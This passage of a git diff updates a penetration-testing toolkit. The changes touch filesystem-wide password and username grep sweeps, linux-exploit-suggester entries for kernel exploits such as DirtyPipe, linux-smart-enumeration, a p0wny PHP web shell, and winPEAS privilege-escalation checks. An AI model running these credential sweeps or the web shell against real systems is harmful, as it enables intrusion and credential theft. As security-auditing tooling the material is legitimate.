-not -path "*/node_modules/*" -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Usernames (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & +print_3title_no_nl "Searching Usernames (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait echo '' +else + echo "Regexes to search for API keys aren't activated, use param '-r' " fi fi echo '' diff --git a/linux-exploit-suggester.sh b/linux-exploit-suggester.sh index 51582ce..42b7768 100755 --- a/linux-exploit-suggester.sh +++ b/linux-exploit-suggester.sh @@ -1,7 +1,7 @@ #!/bin/bash # -# Copyright (c) 2016-2020, @_mzet_ +# Copyright (c) 2016-2022, @_mzet_ # # linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY. # This is free software, and you are welcome to redistribute it @@ -930,6 +930,44 @@ author: theflow (orginal exploit author); bcoles (author of exploit update at 'e EOF ) +EXPLOITS[((n++))]=$(cat <=5.8,ver<=5.16.11 +Tags: ubuntu=(20.04|21.04),debian=11 +Rank: 1 +analysis-url: https://dirtypipe.cm4all.com/ +src-url: https://haxx.in/files/dirtypipez.c +exploit-db: 50808 +author: blasty (original exploit author: Max Kellermann) +EOF +) + +EXPLOITS[((n++))]=$(cat <=3.16,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 +Tags: ubuntu=(20.04){kernel:5.12.13} +Rank: 1 +analysis-url: https://www.openwall.com/lists/oss-security/2022/08/29/5 +src-url: https://www.openwall.com/lists/oss-security/2022/08/29/5/1 +Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN) +author: vulnerability discovery: Team Orca of Sea Security; Exploit author: Alejandro Guerrero +EOF +) + +EXPLOITS[((n++))]=$(cat < # GitHub: https://github.com/diego-treitos/linux-smart-enumeration # -lse_version="3.10" +lse_version="4.10nw" -#( Colors +##( Colors # -# fg +#( fg red='\e[31m' lred='\e[91m' green='\e[32m' @@ -26,8 +26,8 @@ grey='\e[90m' lgrey='\e[37m' white='\e[97m' black='\e[30m' -# -# bg +##) +#( bg b_red='\e[41m' b_lred='\e[101m' b_green='\e[42m' @@ -44,8 +44,8 @@ b_grey='\e[100m' b_lgrey='\e[47m' b_white='\e[107m' b_black='\e[40m' -# -# special +##) +#( special reset='\e[0;0m' bold='\e[01m' italic='\e[03m' @@ -59,13 +59,13 @@ underline_off='\e[24m' inverse_off='\e[27m' conceil_off='\e[28m' crossedout_off='\e[29m' +##) #) -#( Globals +##( Globals # # user -lse_user_id="$UID" -[ -z "$lse_user_id" ] && lse_user_id="`id -u`" +lse_user_id="`id -u`" lse_user="$USER" [ -z "$lse_user" ] && lse_user="`id -nu`" lse_pass="" @@ -77,7 +77,8 @@ lse_arch="`uname -m`" lse_linux="`uname -r`" lse_hostname="`hostname`" lse_distro=`command -v lsb_release >/dev/null 2>&1 && lsb_release -d | sed 's/Description:\s*//' 2>/dev/null` -[ -z "$lse_distro" ] && lse_distro="`(source /etc/os-release && echo "$PRETTY_NAME")2>/dev/null`" +[ -z "$lse_distro" ] && lse_distro="`(. /etc/os-release && echo "$PRETTY_NAME")2>/dev/null`" +lse_distro_codename="" # retrieved below with lse_get_distro_codename # lse lse_passed_tests="" @@ -85,11 +86,12 @@ lse_executed_tests="" lse_DEBUG=false lse_procmon_data=`mktemp` lse_procmon_lock=`mktemp` +lse_cve_tmp='' # printf printf "%s" "$reset" | grep -q '\\' && alias printf="env printf" -# internal data +#( internal data lse_common_setuid=" /bin/fusermount /bin/mount @@ -176,12 +178,14 @@ lse_common_setuid=" /usr/sbin/usernetctl /usr/sbin/uuidd " -#regex rules for common setuid +#) +#( regex rules for common setuid lse_common_setuid="$lse_common_setuid /snap/core.* /var/tmp/mkinitramfs.* " -#critical writable files +#) +#( critical writable files lse_critical_writable=" /etc/apache2/apache2.conf /etc/apache2/httpd.conf @@ -235,8 +239,13 @@ lse_critical_writable_dirs=" /root " #) +#( CVE list (populated by the lse packager) +lse_cve_list=" +" #CVElistMARKER +#) +#) -#( Options +##( Options lse_color=true lse_alt_color=false lse_interactive=true @@ -247,16 +256,16 @@ lse_find_opts='-path /proc -prune -o -path /sys -prune -o -path /dev -prune -o' lse_grep_opts='--color=always' #) -#( Lib -cecho() { +##( Lib +cecho() { #( if $lse_color; then printf "%b" "$@" else # If color is disabled we remove it printf "%b" "$@" | sed 's/\x1B\[[0-9;]\+[A-Za-z]//g' fi -} -lse_recolor() { +} #) +lse_recolor() { #( o_white="$white" o_lyellow="$lyellow" o_grey="$grey" @@ -270,11 +279,11 @@ lse_recolor() { lred="$red" lgreen="$b_lgreen$black" lcyan="$cyan" -} -lse_error() { +} #) +lse_error() { #( cecho "${red}ERROR: ${reset}$*\n" >&2 -} -lse_exclude_paths() { +} #) +lse_exclude_paths() { #( local IFS=" " for p in `printf "%s" "$1" | tr ',' '\n'`; do @@ -282,8 +291,8 @@ lse_exclude_paths() { p="${p%%/}" lse_find_opts="$lse_find_opts -path ${p} -prune -o" done -} -lse_set_level() { +} #) +lse_set_level() { #( case "$1" in 0|1|2) lse_level=$(($1)) @@ -293,8 +302,8 @@ lse_set_level() { exit 1 ;; esac -} -lse_help() { +} #) +lse_help() { #( echo "Use: $0 [options]" echo echo " OPTIONS" @@ -319,6 +328,7 @@ lse_help() { echo " pro: Processes related tests." echo " sof: Software related tests." echo " ctn: Container (docker, lxc) related tests." + echo " cve: CVE related tests." echo " Specific tests can be used with their IDs (i.e.: usr020,sud)" echo " -e PATHS Comma separated list of paths to exclude. This allows you" echo " to do faster scans at the cost of completeness" @@ -326,8 +336,8 @@ lse_help() { echo " processes. A value of 0 will disable any watch (default: 60)" echo " -S Serve the lse.sh script in this host so it can be retrieved" echo " from a remote host." -} -lse_ask() { +} #) +lse_ask() { #( local question="$1" # We use stderr to print the question cecho "${white}${question}: ${reset}" >&2 @@ -341,24 +351,24 @@ lse_ask() { return 1 ;; esac -} -lse_request_information() { +} #) +lse_request_information() { #( if $lse_interactive; then cecho "${grey}---\n" [ -z "$lse_user" ] && lse_user=`lse_ask "Could not find current user name. Current user?"` lse_pass=`lse_ask "If you know the current user password, write it here to check sudo privileges"` cecho "${grey}---\n" fi -} -lse_test_passed() { +} #) +lse_test_passed() { #( # Checks if a test passed by ID local id="$1" for i in $lse_passed_tests; do [ "$i" = "$id" ] && return 0 done return 1 -} -lse_test() { +} #) +lse_test() { #( # Test id local id="$1" # Minimum level required for this test to show its output @@ -394,8 +404,8 @@ lse_test() { # Print name and line cecho "${white}[${l}${white}] ${grey}${id}${white} $name${grey}" - for i in $(seq $((${#name}+4)) 67); do - echo -n "." + for i in $(seq $((${#id}+${#name}+10)) 79); do + printf "." done # Check dependencies @@ -445,8 +455,8 @@ lse_test() { fi return 0 fi -} -lse_show_info() { +} #) +lse_show_info() { #( echo cecho "${lcyan} LSE Version:${reset} $lse_version\n" echo @@ -470,12 +480,14 @@ lse_show_info() { fi cecho "${lblue}Architecture:${reset} $lse_arch\n" echo -} -lse_serve() { + cecho "${green}=====================(${yellow} Current Output Verbosity Level: ${cyan}$lse_level ${green})======================${reset}" + echo +} #) +lse_serve() { #( # get port which nc >/dev/null || lse_error "Could not find 'nc' netcat binary." - local_ips="`ip a | grep -Eo 'inet ([0-9]{1,3}\.){3}[0-9]{1,3}' | cut -d' ' -f2`" + local_ips="`ip a | grep -Eo "inet ([0-9]{1,3}\.){3}[0-9]{1,3}" | cut -d' ' -f2`" # Get a valid and non used port port=`od -An -N2 -i /dev/random|grep -Eo '[0-9]+'` @@ -506,8 +518,8 @@ lse_serve() { done # try nc with '-N' (openbsd), then ncat and then use '-q0' (traditional) nc -l -N -p "$port" < "$0" >/dev/null 2>/dev/null || nc -l --send-only -p "$port" < "$0" >/dev/null 2>/dev/null || nc -l -q0 -p "$port" < "$0" >/dev/null -} -lse_header() { +} #) +lse_header() { #( local id="$1" shift local title="$*" @@ -530,8 +542,8 @@ lse_header() { done text="$text(${green} $title ${magenta})=====" cecho "$text${reset}\n" -} -lse_exit() { +} #) +lse_exit() { #( local ec=1 local text="\n${magenta}==================================" [ "$1" ] && ec=$1 @@ -539,18 +551,32 @@ lse_exit() { cecho "$text${reset}\n" rm -f "$lse_procmon_data" rm -f "$lse_procmon_lock" + rm -f "$lse_cve_tmp" exit "$ec" -} -lse_procmon() { +} #) +lse_procmon() { #( # monitor processes #NOTE: The first number will be the number of occurrences of a process due to # uniq -c + local ps_args + local ps_busybox + if ps -V 2>&1 | grep -iq busybox; then + ps_args='-o pid,user,args' + ps_busybox=true + else + ps_args="-ewwwo start_time,pid,user:50,args" + ps_busybox=false + fi while [ -f "$lse_procmon_lock" ]; do - ps -ewwwo start_time,pid,user:50,args + if $ps_busybox; then + ps $ps_args | sed 's/^\([0-9]*\)/? \1 /g' + else + ps $ps_args + fi sleep 0.001 - done | grep -v 'ewwwo start_time,pid,user:50,args' | sed 's/^ *//g' | tr -s '[:space:]' | grep -v "^START" | grep -Ev '[^ ]+ [^ ]+ [^ ]+ \[' | sort -Mr | uniq -c | sed 's/^ *//g' > "$lse_procmon_data" -} -lse_proc_print() { + done | grep -Ev "(pid,user|$lse_user *sed s/)" | sed 's/^ *//g' | tr -s '[:space:]' | grep -Ev "PID *USER *COMMAND" | grep -Ev '[^ ]+ [^ ]+ [^ ]+ \[' | sort -Mr | uniq -c | sed 's/^ *//g' > "$lse_procmon_data" +} #) +lse_proc_print() { #( # Pretty prints output from lse_procmom received via stdin if $lse_color; then printf "${green}%s %8s %8s %s\n" "START" "PID" "USER" "COMMAND" @@ -574,7 +600,57 @@ lse_proc_print() { printf "%s %8s %8s %s\n" "$p_time" "$p_pid" "$p_user" "$p_args" fi done -} +} #) +lse_get_distro_codename() { #( + # Get the distribution name + # + # ubuntu, debian, centos, redhat, opsuse, fedora, rocky + local distro="${grey}unknown${reset}" + if type lsb_release >/dev/null 2>&1; then + distro=`lsb_release -is` + elif [ -f /etc/os-release ]; then + distro=`grep -E '^ID=' /etc/os-release | cut -f2 -d=` + echo "$distro" | grep -qi opensuse && distro=opsuse + elif [ -f /etc/redhat-release ]; then + grep -qi "centos" /etc/redhat-release && distro=centos + grep -qi "fedora" /etc/redhat-release && distro=fedora + grep -qi "red hat" /etc/redhat-release && distro=redhat + grep -qi "rocky" /etc/redhat-release && distro=rocky + fi + printf '%s' "$distro" | tr '[:upper:]' '[:lower:]' | tr -d \"\' +} #) +lse_is_version_bigger() { #( + # check if version v1 is bigger than v2 + local v1="$1"; local v2="$2" ; local vc + [ "$v1" = "$v2" ] && return 1 # equal is not bigger + vc="`printf "%s\n%s\n" "$v1" "$v2" | sort -rV | head -n1`" + [ "$v1" = "$vc" ] && return 0 + return 1 +} #) +lse_get_pkg_version() { #( + # get package version depending on distro + # returns 2 if distro is unknown + # returns 1 if package is not installed (or doesn't exist) + # returns 0 on success, and prints out the package version + pkg_name="$1" + case "$lse_distro_codename" in + debian|ubuntu) + pkg_version=`dpkg -l "$pkg_name" 2>/dev/null | grep -E '^ii' | tr -s ' ' | cut -d' ' -f3` + ;; + centos|redhat|fedora|opsuse|rocky|amzn) + pkg_version=`rpm -q "$pkg_name" 2>/dev/null` + pkg_version="${pkg_version##"$pkg_name"-}" + pkg_version=`echo "$pkg_version" | sed -E 's/\.(aarch64|armv7hl|i686|noarch|ppc64le|s390x|x86_64)$//'` + ;; + *) + return 2 + ;; + esac + [ -z "$pkg_version" ] && return 1 + printf "%s" "$pkg_version" + return 0 +} #) +#) #) ########################################################################( TESTS @@ -638,7 +714,7 @@ lse_run_tests_users() { 'for ep in $lse_exec_paths; do [ "$ep" = "." ] && grep -ER "^ *PATH=.*" /etc/ 2> /dev/null | tr -d \"\'"'"' | grep -E "[=:]\.([:[:space:]]|\$)";done' \ "usr070" } - +#) #########################################################################( sudo lse_run_tests_sudo() { @@ -688,7 +764,7 @@ lse_run_tests_sudo() { "Do we know if any other users used sudo?" \ 'for uh in $(cut -d: -f1,6 /etc/passwd); do [ -f "${uh##*:}/.sudo_as_admin_successful" ] && echo "${uh%%:*}"; done' } - +#) ##################################################################( file system lse_run_tests_filesystem() { @@ -851,7 +927,7 @@ lse_run_tests_filesystem() { "Dump fstab file" \ 'cat /etc/fstab' } - +#) #######################################################################( system lse_run_tests_system() { @@ -907,7 +983,7 @@ lse_run_tests_system() { "System password policies in /etc/login.defs" \ 'grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs' } - +#) #####################################################################( security lse_run_tests_security() { @@ -953,7 +1029,7 @@ lse_run_tests_security() { "Can we read the auditd log?" \ 'al=/var/log/audit/audit.log; test -r "$al" && echo "tail $al:" && echo && tail "$al"' } - +#) ##############################################################( recurrent tasks lse_run_tests_recurrent_tasks() { @@ -1021,7 +1097,7 @@ lse_run_tests_recurrent_tasks() { "Systemd timers" \ 'systemctl list-timers --all' } - +#) ######################################################################( network lse_run_tests_network() { @@ -1072,7 +1148,7 @@ lse_run_tests_network() { "Listening UDP" \ 'netstat -unlp || ss -unlp' } - +#) #####################################################################( services lse_run_tests_services() { @@ -1167,7 +1243,7 @@ lse_run_tests_services() { "Systemd config files permissions" \ 'ls -lthR /lib/systemd/ /etc/systemd/' } - +#) #####################################################################( software lse_run_tests_software() { @@ -1310,7 +1386,7 @@ lse_run_tests_software() { 'screen -v' } - +#) ###################################################################( containers lse_run_tests_containers() { @@ -1341,7 +1417,7 @@ lse_run_tests_containers() { "Is the user a member of any lxc/lxd group?" \ 'groups | grep $lse_grep_opts "lxc\|lxd"' } - +#) ####################################################################( processes lse_run_tests_processes() { @@ -1398,49 +1474,84 @@ lse_run_tests_processes() { 'printf "%s\n" "$lse_proc_bin" | xargs ls -l' \ "pro001" } +#) + +#########################################################################( CVEs +lse_run_tests_cves() { + lse_header "cve" "CVEs" + if [ "${#lse_cve_list}" = 1 ]; then + if [ -z "$lse_selection" ] || printf "%s" "$lse_selection" | grep -iq 'cve'; then + printf "%s\n%s\n%s" \ + " In order to test for CVEs, download lse.sh from the GitHub releases page." \ + " Alternatively, build lse_cve.sh using tools/package_cvs_into_lse.sh from the" \ + " repository." + fi + else + for lse_cve in $lse_cve_list; do + eval "$(printf '%s' "$lse_cve" | base64 -d | gunzip -c)" + + lse_test "$lse_cve_id" "$lse_cve_level" \ + "$lse_cve_description" \ + "lse_cve_test" + done + fi +} +#) # ##) #( Main -while getopts "hcCil:e:p:s:S" option; do - case "${option}" in - c) lse_color=false; lse_grep_opts='--color=never';; - C) lse_alt_color=true;; - e) lse_exclude_paths "${OPTARG}";; - i) lse_interactive=false;; - l) lse_set_level "${OPTARG}";; - s) lse_selection="`printf \"%s\" \"${OPTARG}\"|sed 's/,/ /g'`";; - p) lse_proc_time="${OPTARG}";; - S) lse_serve; exit $?;; - h) lse_help; exit 0;; - *) lse_help; exit 1;; - esac -done +main() { + while getopts "hcCil:e:p:s:S" option; do + case "${option}" in + c) lse_color=false; lse_grep_opts='--color=never';; + C) lse_alt_color=true;; + e) lse_exclude_paths "${OPTARG}";; + i) lse_interactive=false;; + l) lse_set_level "${OPTARG}";; + s) lse_selection="`printf \"%s\" \"${OPTARG}\"|sed 's/,/ /g'`";; + p) lse_proc_time="${OPTARG}";; + S) lse_serve; exit $?;; + h) lse_help; exit 0;; + *) lse_help; exit 1;; + esac + done -#trap to exec on SIGINT -trap "lse_exit 1" 2 + #trap to exec on SIGINT + trap "lse_exit 1" 2 -# use alternative color scheme -$lse_alt_color && lse_recolor + # use alternative color scheme + $lse_alt_color && lse_recolor -lse_request_information -lse_show_info -PATH="$PATH:/sbin:/usr/sbin" #fix path just in case + lse_request_information + lse_show_info + PATH="$PATH:/sbin:/usr/sbin" #fix path just in case + lse_distro_codename=`lse_get_distro_codename` -lse_procmon & -(sleep "$lse_proc_time"; rm -f "$lse_procmon_lock") & + lse_procmon & + (sleep "$lse_proc_time"; rm -f "$lse_procmon_lock") & -lse_run_tests_users -lse_run_tests_sudo -lse_run_tests_filesystem -lse_run_tests_system -lse_run_tests_security -lse_run_tests_recurrent_tasks -lse_run_tests_network -lse_run_tests_services -lse_run_tests_software -lse_run_tests_containers -lse_run_tests_processes + ## NO WAR + lse_header "nowar" "humanity" + lse_test "nowar0" "0" \ + 'Should we question autocrats and their "military operations"?' \ + 'cecho " $black$b_blue NO $reset\n $black$b_yellow WAR $reset"' -lse_exit 0 + lse_run_tests_users + lse_run_tests_sudo + lse_run_tests_filesystem + lse_run_tests_system + lse_run_tests_security + lse_run_tests_recurrent_tasks + lse_run_tests_network + lse_run_tests_services + lse_run_tests_software + lse_run_tests_containers + lse_run_tests_processes + lse_run_tests_cves + + lse_exit 0 +} + +[ ! "$lse_NO_EXEC" ] && main "$@" #) diff --git a/p0wny-shell.php b/p0wny-shell.php index f8f41c3..629f0c3 100644 --- a/p0wny-shell.php +++ b/p0wny-shell.php @@ -1,14 +1,22 @@ &1)?$/", $cmd)) { + chdir(expandPath("~")); } elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) { chdir($cwd); preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match); - chdir($match[1]); + chdir(expandPath($match[1])); } elseif (preg_match("/^\s*download\s+[^\s]+\s*(2>&1)?$/", $cmd)) { chdir($cwd); preg_match("/^\s*download\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match); diff --git a/web_service_finder.py b/web_service_finder.py index f2864a1..44fa88a 100755 --- a/web_service_finder.py +++ b/web_service_finder.py @@ -8,6 +8,7 @@ import requests import urllib.parse import util from bs4 import BeautifulSoup +from crawl_urls import Crawler requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) @@ -208,7 +209,7 @@ class WebServiceFinder: litecart_pattern = re.compile(r"^https://www.litecart.net") wordpress_pattern = re.compile(r"/wp-(admin|includes|content)/(([^/]+)/)*(wp-emoji-release.min.js|style.min.css)\?ver=([0-9.]+)(&|$)") - urls = util.collectUrls(soup) + urls = Crawler(self.url).collect_urls(soup) for url in urls: self.printMatch("Moodle", moodle_pattern_1.search(url), version_func=lambda v: self.retrieveMoodleVersion(int(v))) self.printMatch("Moodle", moodle_pattern_2.search(url), version_func=lambda v: "%d.%d" % (int(v)//10,int(v)%10)) diff --git a/win/accesschk.exe b/win/accesschk.exe index 6fc4abf..27a57c1 100644 Binary files a/win/accesschk.exe and b/win/accesschk.exe differ diff --git a/win/accesschk64.exe b/win/accesschk64.exe index 0c1c01c..4ca9592 100644 Binary files a/win/accesschk64.exe and b/win/accesschk64.exe differ diff --git a/win/winPEAS.bat b/win/winPEAS.bat index 230fb11..00ae859 100644 --- a/win/winPEAS.bat +++ b/win/winPEAS.bat @@ -55,7 +55,7 @@ ECHO. CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO CALL :ColorLine " %E%33m[+]%E%97m WINDOWS OS" ECHO. [i] Check for vulnerabilities for the OS version with the applied patches -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits +ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits systeminfo ECHO. CALL :T_Progress 2 @@ -174,7 +174,7 @@ CALL :T_Progress 1 :UACSettings CALL :ColorLine " %E%33m[+]%E%97m UAC Settings" ECHO. [i] If the results read ENABLELUA REG_DWORD 0x1, part or all of the UAC components are on -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access +ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA 2>nul ECHO. CALL :T_Progress 1 @@ -225,7 +225,7 @@ CALL :T_Progress 1 :InstalledSoftware CALL :ColorLine " %E%33m[+]%E%97m INSTALLED SOFTWARE" ECHO. [i] Some weird software? Check for vulnerabilities in unknow software installed -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software +ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#software ECHO. dir /b "C:\Program Files" "C:\Program Files (x86)" | sort reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s | findstr InstallLocation | findstr ":\\" @@ -236,7 +236,7 @@ CALL :T_Progress 2 :RemodeDeskCredMgr CALL :ColorLine " %E%33m[+]%E%97m Remote Desktop Credentials Manager" -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#remote-desktop-credential-manager +ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#remote-desktop-credential-manager IF exist "%LOCALAPPDATA%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" ECHO.Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files ECHO. CALL :T_Progress 1 @@ -244,7 +244,7 @@ CALL :T_Progress 1 :WSUS CALL :ColorLine " %E%33m[+]%E%97m WSUS" ECHO. [i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit) -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus +ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\ 2>nul | findstr /i "wuserver" | findstr /i "http://" ECHO. CALL :T_Progress 1 @@ -252,7 +252,7 @@ CALL :T_Progress 1 :RunningProcesses CALL :ColorLine " %E%33m[+]%E%97m RUNNING PROCESSES" ECHO. [i] Something unexpected is running? Check for vulnerabilities -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes +ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#running-processes tasklist /SVC ECHO. CALL :T_Progress 2 @@ -273,7 +273,7 @@ CALL :T_Progress 3 :RunAtStartup CALL :ColorLine " %E%33m[+]%E%97m RUN AT STARTUP" ECHO. [i] Check if you can modify any binary that is going to be executed by admin or if you can impersonate a not found binary -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#run-at-startup +ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#run-at-startup ::(autorunsc.exe -m -nobanner -a * -ct /accepteula 2>nul || wmic startup get caption,command 2>nul | more & ^ reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^ reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^ @@ -297,7 +297,7 @@ CALL :T_Progress 2 :AlwaysInstallElevated CALL :ColorLine " %E%33m[+]%E%97m AlwaysInstallElevated?" ECHO. [i] If '1' then you can install a .msi file with admin privileges ;) -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated +ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul ECHO. @@ -361,7 +361,7 @@ CALL :T_Progress 1 :BasicUserInfo CALL :ColorLine "%E%32m[*]%E%97m BASIC USER INFO ECHO. [i] Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebbugPrivilege -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups +ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#users-and-groups ECHO. CALL :ColorLine " %E%33m[+]%E%97m CURRENT USER" net user %username% @@ -435,7 +435,7 @@ ECHO. :ServiceBinaryPermissions CALL :ColorLine " %E%33m[+]%E%97m SERVICE BINARY PERMISSIONS WITH WMIC and ICACLS" -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services +ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services for /f "tokens=2 delims='='" %%a in ('cmd.exe /c wmic service list full ^| findstr /i "pathname" ^|findstr /i /v "system32"') do ( for /f eol^=^"^ delims^=^" %%b in ("%%a") do icacls "%%b" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos usuarios %username%" && ECHO. ) @@ -444,7 +444,7 @@ CALL :T_Progress 1 :CheckRegistryModificationAbilities CALL :ColorLine " %E%33m[+]%E%97m CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY" -ECHO. [?] 